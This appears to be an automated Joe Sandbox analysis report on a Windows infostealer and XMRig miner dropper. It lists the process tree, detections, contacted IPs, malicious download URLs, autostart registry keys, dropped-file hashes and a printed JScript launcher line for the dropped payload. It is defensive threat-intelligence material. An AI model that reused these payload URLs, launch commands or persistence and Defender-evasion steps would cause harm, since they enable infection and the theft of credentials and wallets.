                • dropped: C:\Users\user\AppData\...\smartscreen.exe, PE32+
                • dropped: C:\Users\user\AppData\Local\...\runsteal.bat, DOS
                • dropped: C:\Users\user\AppData\Local\...\download.bat, DOS
                • dropped: C:\Users\user\AppData\...\checkmiexe.bat, DOS
                • Protects its processes via BreakOnTermination flag
                • Loading BitLocker PowerShell Module
                • Reads the Security eventlog
                • Reads the System eventlog
                • cmd.exe
                    • Suspicious powershell command line found
                    • Tries to download and execute files (via powershell)
                    • Adds a directory exclusion to Windows Defender
                    • powershell.exe
                        • COMSurrogate.exe
                            • dropped: C:\Users\user\AppData\Local\asm\mi.exe, PE32+
                            • dropped: C:\Users\user\AppData\...\WinRing0x64.sys, PE32+
                            • Multi AV Scanner detection for dropped file
                            • Machine Learning detection for dropped file
                            • Creates multiple autostart registry keys
                            • Sample is not signed and drops a device driver
                    • powershell.exe
                        • Loading BitLocker PowerShell Module
                        • Powershell drops PE file
                    • powershell.exe
                        • dropped: C:\Users\user\AppData\...\COMSurrogate.exe, PE32+
                    • 2 other processes
                        • net1.exe
                • cmd.exe
                    • cmd.exe
                        • Tries to steal Crypto Currency Wallets
                        • xcopy.exe
                            • Tries to harvest and steal browser information (history, passwords, etc)
                        • cmd.exe
                            • curl.exe
                                • 172.67.74.152 CLOUDFLARENETUS United States
                                • 127.0.0.1 unknown unknown
                        • cmd.exe
                            • curl.exe
                        • 3 other processes
                    • powershell.exe
                        • 203.161.45.11 VNPT-AS-VNVNPTCorpVN Malaysia
                        • dropped: C:\Users\user\...\downloaded_script.bat, DOS
                    • conhost.exe
                • cmd.exe
                    • net.exe
                        • net1.exe
                    • 4 other processes
                • smartscreen.exe
                    • Multi AV Scanner detection for dropped file
                    • Machine Learning detection for dropped file
                    • Creates multiple autostart registry keys
            • cmd.exe 1
                • conhost.exe
                • schtasks.exe 1
            • schtasks.exe 1
                • conhost.exe
        • cmd.exe 2
        • conhost.exe
        • 6 other processes
• wscript.exe 1
    • Windows Scripting host queries suspicious COM object (likely to drop second stage)
    • ApolloPro.scr
• smartscreen.exe
• 3 other processes

Source | Detection | Scanner | Label
DM6vAAgoCw.exe | 32% | ReversingLabs | Win32.Backdoor.AutorunsNemesis
DM6vAAgoCw.exe | 31% | Virustotal |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\asm\mi.exe | 100% | Avira | HEUR/AGEN.1311679
C:\Users\user\AppData\Local\Temp\smartscreen.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\asm\COMSurrogate.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\asm\mi.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\491505\Dr.com | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\Artistic | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\Commissioner | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\smartscreen.exe | 42% | ReversingLabs | ByteCode-MSIL.Infostealer.ClipBanker
C:\Users\user\AppData\Local\asm\COMSurrogate.exe | 71% | ReversingLabs | ByteCode-MSIL.Coinminer.XMRig
C:\Users\user\AppData\Local\asm\WinRing0x64.sys | 5% | ReversingLabs |
C:\Users\user\AppData\Local\asm\mi.exe | 63% | ReversingLabs | Win64.Trojan.Miner
                                  No Antivirus matches
                                  No Antivirus matches
Source | Detection | Scanner | Label
https://exodus.lat/ss.bat | 100% | Avira URL Cloud | malware
https://exodus.lat/COMSurrogate.exe | 100% | Avira URL Cloud | malware
https://exodus.lat/COMSurrogat | 0% | Avira URL Cloud | safe
                                  No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, Dr.com, 0000000A.00000000.2139917691.0000000000DC9000.00000002.00000001.01000000.00000007.sdmp, ApolloPro.scr, 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp | false | | high
https://exodus.lat/ss.bat | RegAsm.exe, 00000016.00000002.4571175471.0000000003217000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://exodus.lat/COMSurrogate.exe | RegAsm.exe, 00000016.00000002.4571175471.0000000003217000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://nsis.sf.net/NSIS_ErrorError | DM6vAAgoCw.exe, 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp, DM6vAAgoCw.exe, 00000000.00000000.2111219967.0000000000409000.00000002.00000001.01000000.00000003.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://exodus.lat/COMSurrogat | RegAsm.exe, 00000016.00000002.4571175471.000000000300E000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://www.autoitscript.com/autoit3/ | Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
203.161.45.11 | unknown | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | false
45.74.38.211 | unknown | United States | 9009 | M247GB | true
172.67.74.152 | unknown | United States | 13335 | CLOUDFLARENETUS | false

IP
127.0.0.1
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1569756
                                              Start date and time:2024-12-06 09:31:52 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 13m 11s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:56
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:DM6vAAgoCw.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:a67e34baacfca98f323981d3b0087f3b.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.mine.winEXE@93/67@0/4
                                              EGA Information:
                                              • Successful, ratio: 33.3%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 84
                                              • Number of non-executed functions: 314
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                              • Execution Graph export aborted for target COMSurrogate.exe, PID 3132 because it is empty
                                              • Execution Graph export aborted for target COMSurrogate.exe, PID 4916 because it is empty
                                              • Execution Graph export aborted for target COMSurrogate.exe, PID 912 because it is empty
                                              • Execution Graph export aborted for target smartscreen.exe, PID 2488 because it is empty
                                              • Execution Graph export aborted for target smartscreen.exe, PID 5172 because it is empty
                                              • Execution Graph export aborted for target smartscreen.exe, PID 712 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              • Skipping network analysis since amount of network traffic is too extensive
Time | Type | Description
03:32:42 | API Interceptor | 1x Sleep call for process: DM6vAAgoCw.exe modified
03:33:23 | API Interceptor | 5310x Sleep call for process: Dr.com modified
03:35:25 | API Interceptor | 96834x Sleep call for process: RegAsm.exe modified
03:35:35 | API Interceptor | 105x Sleep call for process: powershell.exe modified
03:35:43 | API Interceptor | 28082x Sleep call for process: COMSurrogate.exe modified
03:36:10 | API Interceptor | 296628x Sleep call for process: smartscreen.exe modified
09:32:48 | Task Scheduler | Run new task: ApolloPro path: wscript s>//B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js"
09:35:38 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SmartScreen C:\Users\user\AppData\Local\Temp\smartscreen.exe
09:35:46 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run COM Surrogate C:\Users\user\AppData\Local\asm\COMSurrogate.exe
09:35:54 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SmartScreen C:\Users\user\AppData\Local\Temp\smartscreen.exe
09:36:03 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run COM Surrogate C:\Users\user\AppData\Local\asm\COMSurrogate.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
203.161.45.11 | nfkciRoR4j.exe | malicious | Xmrig |
203.161.45.11 | File.exe | malicious | Orcus, Xmrig |
45.74.38.211 | File.exe | malicious | Orcus, Xmrig |
172.67.74.152 | 2b7cu0KwZl.exe | malicious | Unknown | api.ipify.org/
172.67.74.152 | Zc9eO57fgF.elf | malicious | Unknown | api.ipify.org/
172.67.74.152 | 67065b4c84713_Javiles.exe | malicious | RDPWrap Tool | api.ipify.org/
172.67.74.152 | Yc9hcFC1ux.exe | malicious | Unknown | api.ipify.org/
172.67.74.152 | 4F08j2Rmd9.bin | malicious | Xmrig | api.ipify.org/
172.67.74.152 | y8tCHz7CwC.bin | malicious | Xmrig | api.ipify.org/
172.67.74.152 | file.exe | malicious | Unknown | api.ipify.org/
172.67.74.152 | file.exe | malicious | Unknown | api.ipify.org/
172.67.74.152 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
172.67.74.152 | file.exe | malicious | RDPWrap Tool | api.ipify.org/
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
M247GB | main_mpsl.elf | malicious | Mirai | 196.16.120.168
M247GB | f5TWdT5EAc.exe | malicious | Phorpiex, RHADAMANTHYS, Xmrig | 91.202.233.141
M247GB | https://forms.zohopublic.com/volt1g1/form/CompleteVehicleAccessoriesLtd/formperma/DjGG5qUda3jrtGBWWHgY7RiBMK57TQ9IEa34k6QF6G0 | malicious | HTMLPhisher | 104.194.128.196
M247GB | arm5.nn.elf | malicious | Mirai, Okiru | 77.232.195.200
M247GB | social security statement.scr.exe | malicious | RedLine | 45.61.159.66
M247GB | http://flcu.ph | malicious | Unknown | 38.132.109.126
M247GB | xd.x86.elf | malicious | Mirai | 185.206.229.140
M247GB | xd.spc.elf | malicious | Mirai | 38.205.129.205
M247GB | File.exe | malicious | Orcus, Xmrig | 45.74.38.211
M247GB | aDGx3jaI7i.exe | malicious | Remcos | 104.250.180.178
VNPT-AS-VNVNPTCorpVN | main_mips.elf | malicious | Mirai | 113.174.188.228
VNPT-AS-VNVNPTCorpVN | main_ppc.elf | malicious | Mirai | 14.165.136.80
VNPT-AS-VNVNPTCorpVN | https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2dd | malicious | EvilProxy, HTMLPhisher | 203.161.63.125
VNPT-AS-VNVNPTCorpVN | https://url.us.m.mimecastprotect.com/s/tWC_CNkXmJcoqkvlsmfBIyQP6j?domain=assets-gbr.mkt.dynamics.com | malicious | EvilProxy, HTMLPhisher | 203.161.63.125
VNPT-AS-VNVNPTCorpVN | lgkWBwqY15.exe | malicious | FormBook | 203.161.42.73
VNPT-AS-VNVNPTCorpVN | https://app.peony.ink/view/902b02a8-11f0-4e28-89b1-5318035c10eb | malicious | EvilProxy, HTMLPhisher | 203.161.63.125
VNPT-AS-VNVNPTCorpVN | New quotation request.exe | malicious | FormBook | 203.161.42.73
VNPT-AS-VNVNPTCorpVN | x86_32.nn.elf | malicious | Mirai, Okiru | 14.234.225.230
VNPT-AS-VNVNPTCorpVN | sparc.nn.elf | malicious | Mirai, Okiru | 14.170.3.101
VNPT-AS-VNVNPTCorpVN | sora.m68k.elf | malicious | Mirai | 14.253.31.193
CLOUDFLARENETUS | PO#2207008 .docm | malicious | Snake Keylogger | 188.114.97.6
CLOUDFLARENETUS | Voicemail_+Transcription001799.docx | malicious | Unknown | 104.21.64.1
CLOUDFLARENETUS | purchase order.exe | malicious | FormBook | 104.21.7.187
CLOUDFLARENETUS | pe61BNJmLf.exe | malicious | Snake Keylogger | 104.21.67.152
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.165.166
CLOUDFLARENETUS | https://l.user-edenred-meyclub.kadeos.com/rts/go2.aspx?h=3782162&tp=i-1NHD-99-2ZH4-1HXNG6-20-1PPCf-1c-11KR2-1HWQl1-lBCrdGKkeH-2H4ZZZ&pi=6DvBMG0gjxmwWZBUOtvVSRjwHoaoPzxcEck6D3-7U78&x=i-1NHD-99-2ZH4-1HXNG6-20-1PPCf-1c-11KR2-1HWQl1-lBCrdGKkeH-2H4ZZZ%7c612254%7c1175284778&hp2=b88d9aa5cea778a386a66e248545bc7b83591c6077edf33fe6b47536c9d63d12 | malicious | Unknown | 104.18.16.32
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.165.166
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 104.21.16.9
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 104.21.16.9
CLOUDFLARENETUS | PO54782322024.exe | malicious | AgentTesla | 172.67.74.152
No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\491505\Dr.com | Setup.exe | malicious | Vidar
C:\Users\user\AppData\Local\Temp\491505\Dr.com | Setup.exe | malicious | Vidar
C:\Users\user\AppData\Local\Temp\491505\Dr.com | Setup.exe | malicious | LummaC Stealer
C:\Users\user\AppData\Local\Temp\491505\Dr.com | xoJxSAotVM.exe | malicious | Vidar
C:\Users\user\AppData\Local\Temp\491505\Dr.com | ton.exe | malicious | Vidar
C:\Users\user\AppData\Local\Temp\491505\Dr.com | ton.exe | malicious | Vidar
C:\Users\user\AppData\Local\Temp\491505\Dr.com | File.exe | malicious | Orcus, Xmrig
C:\Users\user\AppData\Local\Temp\491505\Dr.com | Full_Setup_v24.exe | malicious | LummaC Stealer
C:\Users\user\AppData\Local\Temp\491505\Dr.com | file.exe | malicious | LummaC, Amadey, Clipboard Hijacker, LummaC Stealer
C:\Users\user\AppData\Local\Temp\491505\Dr.com | 'Setup.exe | malicious | LummaC Stealer
C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Setup.exe | malicious | Vidar
C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Setup.exe | malicious | Vidar
C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Setup.exe | malicious | LummaC Stealer
C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | xoJxSAotVM.exe | malicious | Vidar
C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | ton.exe | malicious | Vidar
C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | ton.exe | malicious | Vidar
C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | File.exe | malicious | Orcus, Xmrig
C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Full_Setup_v24.exe | malicious | LummaC Stealer
C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | file.exe | malicious | LummaC, Amadey, Clipboard Hijacker, LummaC Stealer
C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | 'Setup.exe | malicious | LummaC Stealer
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\Dr.com
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):180
                                                                                            Entropy (8bit):4.605364170525915
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:RiMIpGXIdPHo55wWAX+eLCMuL4EkD5mXsMd5NJLW2FZo5uWAX+eLCMuL4EkD5mXp:RiJBJHonwWDeLPqJkDFQ5vfFywWDeLP4
                                                                                            MD5:FD559E76BD719A56973F4A8820540B77
                                                                                            SHA1:C8ADCB5EA97F02E7FD38AC4A9550BD1E142A8A20
                                                                                            SHA-256:72A616940F5318776CD0D4DA5A1B23A0EFBA6BB3FEF153A74AFD06F1445301B4
                                                                                            SHA-512:AD105386FF35E84E5362BBD14D4BFA99E22ED9C3607AEF4CB912530105CBAC8852E0FDF60BF359C7174178D67FA4D812EF4261C626D2AE0BDD62B5EFA18F6B05
                                                                                            Malicious:true
                                                                                            Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\CreativePixel Tech\\ApolloPro.scr\" \"C:\\Users\\user\\AppData\\Local\\CreativePixel Tech\\E\"")
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\Dr.com
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):893608
                                                                                            Entropy (8bit):6.620254876639106
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                                            MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                            SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                                            SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                                            SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:
• Filename: Setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: xoJxSAotVM.exe, Detection: malicious
• Filename: ton.exe, Detection: malicious
• Filename: ton.exe, Detection: malicious
• Filename: File.exe, Detection: malicious
• Filename: Full_Setup_v24.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: 'Setup.exe, Detection: malicious
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\Dr.com
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):6588393
                                                                                            Entropy (8bit):7.999970025562485
                                                                                            Encrypted:true
                                                                                            SSDEEP:196608:PSPuMRQDLs38E6dN9WngQLZ6fcjzSYSKWV4F5C8wBhgbB:PCRYLW68gQLZ6f6BECFY8wBhgbB
                                                                                            MD5:0A1E63FC10DD1DBB8B2DB81E2388BF99
                                                                                            SHA1:67AD39AABBF4875BC1B165CCD5AFC40194D1D3C8
                                                                                            SHA-256:122991768F589431B9166A4E22523BF48A53EFFF73FC2B191955E604196541B7
                                                                                            SHA-512:94C50F06E1D157381B9D0746044B5D015E2946B44291D92739783CB3ED9E91371CF7D1B981D3108D910D7A7000810FE69FBE6590F9A84F822B671866AB9DB5FC
                                                                                            Malicious:false
                                                                                            Preview:.*.;........<$D.\..n.X...o.V*N...s:1.p.(0:.4.8C.w.t..j$.....^o.1.,.....7X=.BM.a,f.`..}xOv...:l..M...z.d..<,U.\.?ZU...S..zs.....l..J.U..{nQ.@K..,{...R._.oX.2."k.P.R...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Ma......m@nD<....d....s..........x.C\X...........J...+....^.w.5............?r.Q..m;.....w.....;.&.......2..g2"~?]...PkA...p...G................@.......@......kC.R......%x....}...q..U-...(....%....V..?p.he....,.. .o.UA..1.An....H.`>$O.ng.)........s+V.p...'|.G...!.$..n.K...;E..<J.W.C3.lY....A8>..>..1...32...T8}..,...E.......\S..i=.#\In>3(..?....d..?..B-...@...s...@......m...........5...x..2).U.j....r>.,#.~.|.b.x...<#hg..|.D.... ..z.{F..P(G.......u.P...j_qC....X....&..KT.|.!.P.is.y.+.....V..42m#NM.9.R.5...W....C.S..(J H-..^..z.P.Y....L....N....{....C.T8u7...p.......J..~..S.0y(._2~........=..$.n5O..^h......6P...66>...=......o.X.........Z.Y>Q..../6.t-3.....`.:.......d....s....u.......X...=.9[...."... 5
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):15612
                                                                                            Entropy (8bit):5.0007665989277985
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:d1VoGIpN6KQkj2qkjh4iUxehQVKoxOdBMNXp5rvOjJiYo0ib4J:d1V3IpNBQkj2Ph4iUxehYKoxOdBMNZd4
                                                                                            MD5:A8D66A40EEA8831B03CDC478ED797E6E
                                                                                            SHA1:F2DB655B7A8F6A211E8F6D95B50B3D7BC325F7CE
                                                                                            SHA-256:09178396408F3B27CBE725A8A455B37894EE4A3DBFCC34636DD23E96AB97C8CA
                                                                                            SHA-512:33C1DA734E45158C61EA1679202BAA3813C71901C9B5D481A09F244C9653C4DD76C1CD12378468579595C3C8CC92F60E868982BB26236841CDAE7BDB5B455C8F
                                                                                            Malicious:false
                                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1872
                                                                                            Entropy (8bit):5.417350451770704
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:LWSU4y4RQmFoUeWmfmZ9tK8NWR8INfAB6byG0t:LLHyIFKL3OZ2KWZby5t
                                                                                            MD5:0F29F770073CD27507A8B4E9BF030D25
                                                                                            SHA1:D61E943AC3E6079FB2A370FE458A36D107D08FBC
                                                                                            SHA-256:A45A04C1CE3512E83B32BC7AC024AAB3E01CAE29914BB88793D6E0CFEC04FC86
                                                                                            SHA-512:EB4E2FE27EA926194223069F5D7C8ECA7B025C185FC709CAB18F7AF20F5272129A2465D3072156D9686EA4F7714ABC4995B71784D2198317BF04EE5D951B9A1D
                                                                                            Malicious:false
                                                                                            Preview:@...e...........m....................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):6588393
                                                                                            Entropy (8bit):7.999970025562485
                                                                                            Encrypted:true
                                                                                            SSDEEP:196608:PSPuMRQDLs38E6dN9WngQLZ6fcjzSYSKWV4F5C8wBhgbB:PCRYLW68gQLZ6f6BECFY8wBhgbB
                                                                                            MD5:0A1E63FC10DD1DBB8B2DB81E2388BF99
                                                                                            SHA1:67AD39AABBF4875BC1B165CCD5AFC40194D1D3C8
                                                                                            SHA-256:122991768F589431B9166A4E22523BF48A53EFFF73FC2B191955E604196541B7
                                                                                            SHA-512:94C50F06E1D157381B9D0746044B5D015E2946B44291D92739783CB3ED9E91371CF7D1B981D3108D910D7A7000810FE69FBE6590F9A84F822B671866AB9DB5FC
                                                                                            Malicious:false
                                                                                            Preview:.*.;........<$D.\..n.X...o.V*N...s:1.p.(0:.4.8C.w.t..j$.....^o.1.,.....7X=.BM.a,f.`..}xOv...:l..M...z.d..<,U.\.?ZU...S..zs.....l..J.U..{nQ.@K..,{...R._.oX.2."k.P.R...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Ma......m@nD<....d....s..........x.C\X...........J...+....^.w.5............?r.Q..m;.....w.....;.&.......2..g2"~?]...PkA...p...G................@.......@......kC.R......%x....}...q..U-...(....%....V..?p.he....,.. .o.UA..1.An....H.`>$O.ng.)........s+V.p...'|.G...!.$..n.K...;E..<J.W.C3.lY....A8>..>..1...32...T8}..,...E.......\S..i=.#\In>3(..?....d..?..B-...@...s...@......m...........5...x..2).U.j....r>.,#.~.|.b.x...<#hg..|.D.... ..z.{F..P(G.......u.P...j_qC....X....&..KT.|.!.P.is.y.+.....V..42m#NM.9.R.5...W....C.S..(J H-..^..z.P.Y....L....N....{....C.T8u7...p.......J..~..S.0y(._2~........=..$.n5O..^h......6P...66>...=......o.X.........Z.Y>Q..../6.t-3.....`.:.......d....s....u.......X...=.9[...."... 5
                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):893608
                                                                                            Entropy (8bit):6.620254876639106
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                                            MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                            SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                                            SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                                            SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: Setup.exe, Detection: malicious
                                                                                            • Filename: Setup.exe, Detection: malicious
                                                                                            • Filename: Setup.exe, Detection: malicious
                                                                                            • Filename: xoJxSAotVM.exe, Detection: malicious
                                                                                            • Filename: ton.exe, Detection: malicious
                                                                                            • Filename: ton.exe, Detection: malicious
                                                                                            • Filename: File.exe, Detection: malicious
                                                                                            • Filename: Full_Setup_v24.exe, Detection: malicious
                                                                                            • Filename: file.exe, Detection: malicious
                                                                                            • Filename: 'Setup.exe, Detection: malicious
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\Dr.com
                                                                                            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):65440
                                                                                            Entropy (8bit):6.049806962480652
                                                                                            Encrypted:false
